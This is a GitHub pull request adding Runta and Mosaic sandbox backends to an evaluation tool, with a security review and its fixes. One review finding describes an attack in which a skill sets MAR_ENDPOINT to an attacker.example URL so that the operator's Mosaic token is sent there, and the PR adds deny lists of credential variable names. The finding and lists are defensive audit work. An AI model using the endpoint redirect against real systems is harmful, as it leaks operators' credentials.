Repository navigation
Conversation
Add --env-mode runta and --env-mode mosaic. Both backends build the task's own Dockerfile, so they run SkillEvaluator's evaluator-staged images unchanged. Their credentials come only from the host environment: RUNTA_TOKEN or RUNTA_CONFIG, and MOSAIC_API_TOKEN (or mos login) plus MOSAIC_REGISTRY_USERNAME/PASSWORD for private base images. Reserve kwargs that bypass the task image or let state and access outlive one isolated trial: Runta's mode (direct mode ignores the task image), and Mosaic's volume, persist, enable_ssh, build_args, and build_target. Credential-shaped kwargs such as Runta's token and Mosaic's secrets stay rejected. Prime and Smol stay unexposed. Prime cannot build a Dockerfile-only task and Smol requires a published image, while SkillEvaluator builds every task from its staged Dockerfile and rejects task-authored images. Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com> Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com> Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
The runta-sdk README documents RUNTA_ENDPOINT, and the Mosaic docs document MOSAIC_API_URL and MOSAIC_RETRIES. Forward these non-secret client settings to the Harbor process for their own backend only, so an operator's non-default endpoint survives the filtered environment. Also note that a RUNTA_CONFIG file must use an absolute path, because Harbor runs from an evaluator-owned directory. Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com> Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com> Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
rng1995
left a comment
There was a problem hiding this comment.
Thorough review of Runta and Mosaic at 45a1a7025: 1 P1, 3 P2 and 4 P3 findings. I installed the real SDKs (runta-sdk 0.2.1, mosaic-sandbox 0.14.7) against SkillEvaluator's lock and read their sources. The reserved kwargs, the rejection of credential-shaped kwargs, the network policy and the absence of direct-mode Runta all check out. Inline comments follow; fixes will be pushed to this branch.
| "runta": frozenset({"RUNTA_CONFIG", "RUNTA_ENDPOINT", "RUNTA_TOKEN"}), | ||
| "mosaic": frozenset( | ||
| { | ||
| "MOSAIC_API_TOKEN", |
There was a problem hiding this comment.
[P1] A skill's runtime_env can redirect the operator's Mosaic token
This set also decides which names a skill's harbor.runtime_env may not set, through _is_operator_owned_runtime_name. It leaves out MOSAIC_CONFIG and the SDK's legacy names MAR_ENDPOINT and MAR_CONFIG (LEGACY_ENV_NAMES in mosaic_sandbox/credentials.py).
Scenario:
- A skill sets
runtime_env: {MAR_ENDPOINT: https://attacker.example}. It is accepted, while the same value underMOSAIC_API_URLis rejected. _harbor_subprocess_environmentplaces it in Harbor's environment.- With
MOSAIC_API_URLunset, the SDK resolves the attacker URL. - The first snapshot call sends
authorization: Bearer <MOSAIC_API_TOKEN or the mos login token>there.
A skill-controlled MOSAIC_CONFIG can point at a config file with an attacker endpoint to the same effect.
Fix: add MAR_API_TOKEN, MAR_ENDPOINT, MAR_CONFIG and MOSAIC_CONFIG to this set, so they are both forwarded for operators and blocked for skills. Add a _resolve_runtime_env regression test for each name.
There was a problem hiding this comment.
Addressed in d245d41: MAR_API_TOKEN, MAR_ENDPOINT, MAR_CONFIG and MOSAIC_CONFIG are now in the Mosaic set. Operators' values are forwarded, and a skill's runtime_env can no longer set them. test_skill_runtime_env_cannot_redirect_runta_or_mosaic_credentials covers each name. test_mosaic_allowlist_covers_the_sdk_credential_names checks the set against the SDK's LEGACY_ENV_NAMES when mosaic-sandbox is installed; it passes against 0.14.7.
| ), | ||
| "hyperbrowser": _DOCKER_HOST_ENV_VARS | frozenset({"HYPERBROWSER_API_KEY", "HYPERBROWSER_BASE_URL"}), | ||
| "vercel": frozenset({"VERCEL_OIDC_TOKEN", "VERCEL_PROJECT_ID", "VERCEL_TEAM_ID", "VERCEL_TOKEN"}), | ||
| "runta": frozenset({"RUNTA_CONFIG", "RUNTA_ENDPOINT", "RUNTA_TOKEN"}), |
There was a problem hiding this comment.
[P2] A relative RUNTA_CONFIG is forwarded but not anchored
The Runta SDK opens Path(RUNTA_CONFIG).expanduser() relative to Harbor's empty, evaluator-owned working directory. A relative or missing RUNTA_CONFIG still passes doctor, and then every trial fails with a missing token. Worse, if RUNTA_TOKEN is also set, the file's endpoint is silently ignored and the token goes to the default API.
Fix: anchor RUNTA_CONFIG (and MOSAIC_CONFIG/MAR_CONFIG) like the other host-path variables, and check that a configured file exists, as for MODAL_CONFIG_PATH.
There was a problem hiding this comment.
Addressed in d245d41: RUNTA_CONFIG, MOSAIC_CONFIG and MAR_CONFIG are anchored like the other host-path variables, and the prerequisite check requires a configured file to exist. Tests: test_runta_and_mosaic_config_paths_survive_the_evaluator_owned_launch_directory and test_runta_and_mosaic_config_files_must_exist. The docs drop the absolute-path caveat.
| ignores the task image, while Harbor's automatic selection builds the task's | ||
| Dockerfile or Compose definition inside the runtime. | ||
|
|
||
| Mosaic authenticates with `MOSAIC_API_TOKEN` or the credential that `mos login` |
There was a problem hiding this comment.
[P2] Mosaic doctor checks a different environment than Harbor receives
MosaicEnvironment.preflight() runs inside SkillEvaluator against the full os.environ, but Harbor gets the filtered environment.
- Doctor passes when the only credential is
MAR_API_TOKEN, aMOSAIC_CONFIGfile, or anE2B_API_KEYthat holds a Mosaic token. The SDK accepts that last one for E2B migrations. harbor runthen resolves no token and fails, in thetier3workflow only after dataset generation.
Fix: forward the legacy names (see the P1), and fail preflight when the only Mosaic token comes from E2B_API_KEY, which is never forwarded to Mosaic.
There was a problem hiding this comment.
Addressed in d245d41: with the legacy names and MOSAIC_CONFIG forwarded, doctor and Harbor resolve the same Mosaic credential. The one source Harbor never sees, a Mosaic token in E2B_API_KEY, now fails the prerequisite check and points to MOSAIC_API_TOKEN or mos login (test_mosaic_rejects_a_token_only_in_e2b_api_key). Checked against mosaic-sandbox 0.14.7.
| # Persistent volumes, persisted sandboxes, SSH access, and alternate build | ||
| # inputs would let state or access outlive one isolated trial or skip | ||
| # evaluator-staged Dockerfile layers. | ||
| "mosaic": frozenset({"build_args", "build_target", "enable_ssh", "persist", "volume"}), |
There was a problem hiding this comment.
[P2] Mosaic snapshots are reused account-wide and never deleted
Harbor reuses any existing snapshot named harbor-<task name>-<12 hex of the environment id> and never deletes Mosaic snapshots, so the staged skill, inputs and repository context stay in the account. The with-skill and baseline arms never share a snapshot, because their build contexts differ. But anyone with write access to the account who creates that name first controls the image later evaluations run in.
Fix: either pass --force-build for mosaic, which gives each job its own names but retains a snapshot per job, or document that evaluations need a dedicated Mosaic account and that snapshots are reused and retained.
There was a problem hiding this comment.
Addressed in d245d41 with documentation rather than --force-build. Forced builds give each job its own snapshot names, but Harbor still never deletes them, so they would multiply the retained skills and inputs and rebuild for every job. Snapshot names derive from the task and its build context, so the two arms never share one, and claiming a name requires write access to the operator's Mosaic account. The Mosaic section now says to run evaluations in an account only trusted operators can write to, and to delete old harbor-* snapshots.
| - Tier 3 log converters now rebuild ATIF trajectories from OpenCode JSON streams | ||
| (`opencode.txt`) and structured Codex tee logs (`codex.txt`) when | ||
| `trajectory.json` is missing or empty. | ||
| - `--env-mode runta` and `--env-mode mosaic` run Tier 3 trials on Harbor's Runta |
There was a problem hiding this comment.
[P3] The CHANGELOG contradicts itself
The same Unreleased section still says "Exposed 23 Harbor 0.24 backends" and lists runta and mosaic as disabled.
There was a problem hiding this comment.
Addressed in d245d41: the entry now says 25 backends and no longer lists runta or mosaic as disabled.
| dependencies, and inputs — through a trusted image or backend-native | ||
| provisioning path, with credentials and constructor options reviewed per | ||
| backend. Selecting one of those names is rejected before a run starts. Prime | ||
| builds only Compose tasks and Smol runs only a published |
There was a problem hiding this comment.
[P3] The Prime rationale is overstated
"Neither can run SkillEvaluator tasks" is too strong. Prime does build Compose tasks, and SkillEvaluator supports evals/environment/docker-compose.yaml. Say instead that Prime cannot build Dockerfile-only tasks, which is how SkillEvaluator stages most tasks, and that exposing it needs Compose-only staging validated live.
There was a problem hiding this comment.
Addressed in d245d41: the docs now say Prime cannot build Dockerfile-only tasks, which is how SkillEvaluator stages most tasks, and that exposing it needs Compose-only staging validated live.
| "hyperbrowser": "hyperbrowser", | ||
| "vercel": "vercel", | ||
| "runta": "runta", | ||
| "mosaic": "mosaic", |
There was a problem hiding this comment.
[P3] Mosaic rejects Compose tasks late, and its install hint is wrong
- Harbor's Mosaic backend rejects any
environment/docker-compose.yaml("support one VM"), so Compose-based evals fail on every trial instead of before the run. Reject them while staging and document it. - When the extra is missing, the message repeats Harbor's "install all cloud environments with
harbor[cloud]" hint, butharbor[cloud]does not includemosaic(orskypilot). Drop that sentence in favor of SkillEvaluator's pinned per-backend hint.
There was a problem hiding this comment.
Addressed in d245d41: Mosaic Compose tasks are now rejected while staging, before Harbor starts (test_mosaic_rejects_compose_tasks_before_harbor_starts), and the docs say so. Missing-extra messages keep Harbor's first sentence and use SkillEvaluator's pinned hint, without Harbor's unpinned install commands or the harbor[cloud] line (test_missing_extra_message_keeps_harbor_diagnosis_without_unpinned_install_hints).
Address the #183 review: - Forward Mosaic's MOSAIC_CONFIG and the SDK's legacy MAR_API_TOKEN, MAR_ENDPOINT and MAR_CONFIG names. The backend allowlist also decides which names a skill's harbor.runtime_env may not set, so a skill could previously point MAR_ENDPOINT or MOSAIC_CONFIG at its own endpoint and receive the operator's Mosaic token. - Anchor relative RUNTA_CONFIG, MOSAIC_CONFIG and MAR_CONFIG paths against the operator's directory, since Harbor runs from an evaluator-owned one, and require a configured file to exist. - Reject a Mosaic token found only in E2B_API_KEY, which doctor accepted but which never reaches Harbor's Mosaic backend. - Reject Docker Compose tasks for Mosaic while staging; Harbor's Mosaic backend runs one VM and would fail every trial. - Keep Harbor's missing-extra diagnosis but drop its unpinned install commands and its harbor[cloud] hint, which does not include mosaic. - Document Mosaic snapshot reuse and retention, correct the CHANGELOG backend count, and state the Prime rationale precisely. Signed-off-by: Narendran Raghavan <nraghavan@nvidia.com> Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Stacked on #83 (Harbor 0.24.0). The base is
feat/christopherk/issue-79-harbor-upgrade; retarget tomainafter #83 merges.Summary
This PR exposes two of Harbor 0.24's managed backends,
--env-mode runtaand--env-mode mosaic. Both build the task's own Dockerfile (Runta inside its runtime, Mosaic as a snapshot), so they run SkillEvaluator's evaluator-staged images unchanged.flowchart LR OP["Operator host environment"] --> AL["Per-backend allowlist<br/>also blocks skill runtime_env"] AL --> H["harbor run --env runta / mosaic<br/>empty SE-owned directory, anchored config paths"] H --> RT["Runta runtime<br/>builds the task Dockerfile"] H --> MO["Mosaic snapshot + VM<br/>one VM per trial"] SKILL["Skill evals/config.yml"] -. cannot set .-> ALCredentials (host environment only)
RUNTA_TOKEN,RUNTA_CONFIG(a file, default~/.config/runta/config.toml),RUNTA_ENDPOINTMOSAIC_API_TOKEN,MOSAIC_API_URL,MOSAIC_CONFIG(default~/.config/mosaic-sandbox/config.json, wheremos loginsaves the token), the SDK's legacyMAR_API_TOKEN,MAR_ENDPOINTandMAR_CONFIG,MOSAIC_RETRIES,MOSAIC_REGISTRY_USERNAMEandMOSAIC_REGISTRY_PASSWORDThese names were read from the runta-sdk 0.2.1 and mosaic-sandbox 0.14.7 sources.
E2B_API_KEYis rejected, because that variable never reaches Mosaic.token, and Mosaic'ssecrets, which would inject provider secrets into the agent's sandbox.Reserved kwargs
mode.mode=directruns commands in Runta's base runtime and ignores the task image. Harbor's automatic selection uses the task's Dockerfile or Compose definition.volume,persistandenable_ssh. These would let state or access outlive one isolated trial.build_argsandbuild_target. These could skip or alter evaluator-staged Dockerfile layers.Staging and docs
harbor-*snapshots.harbor[cloud]line.Prime and Smol are not included
Both stay unexposed, with the reason documented.
[environment].docker_image, which SkillEvaluator rejects because it bypasses the evaluator-staged image.Exposing either needs Compose-only staging or a trusted image-publishing step, validated live. For that work, the SDK docs list these credentials:
PRIME_API_KEY, or~/.prime/config.json.SMOL_CLOUD_TOKENfor cloud targets;SMOLVM_BOOT_BINARYandSMOLVM_LIB_DIRfor local microVMs.Review
All findings from the review on this PR are fixed in
d245d41; each thread has a reply:Verification
d245d41(Python 3.12): 11,311 passed with 21 skipped. The original commit passed 11,289 tests on both Python 3.12 and 3.13.harbor[runta,mosaic]==0.24.0(runta-sdk 0.2.1, mosaic-sandbox 0.14.7) installs under SkillEvaluator's locked dependencies without conflicts, and Harbor's Runta and Mosaic modules import. With them installed:skillevaluator doctor --env-mode runtafails closed with "Runta requires RUNTA_TOKEN or RUNTA_CONFIG.";--env-mode mosaicfails closed with "Mosaic requires an API credential … Runmos login";persistare rejected;E2B_API_KEYis rejected.runtime_envrejection for every Runta and Mosaic credential, endpoint and config name;git diff --checkare clean.Not exercised against real Runta or Mosaic accounts, because no credentials were available. A live run needs:
RUNTA_TOKENor aRUNTA_CONFIGfile;MOSAIC_API_TOKENor amos loginsession.Then run
skillevaluator doctor --env-mode runta|mosaicand one generated-dataset run on each.All commits carry DCO sign-offs.
🤖 Generated with Claude Code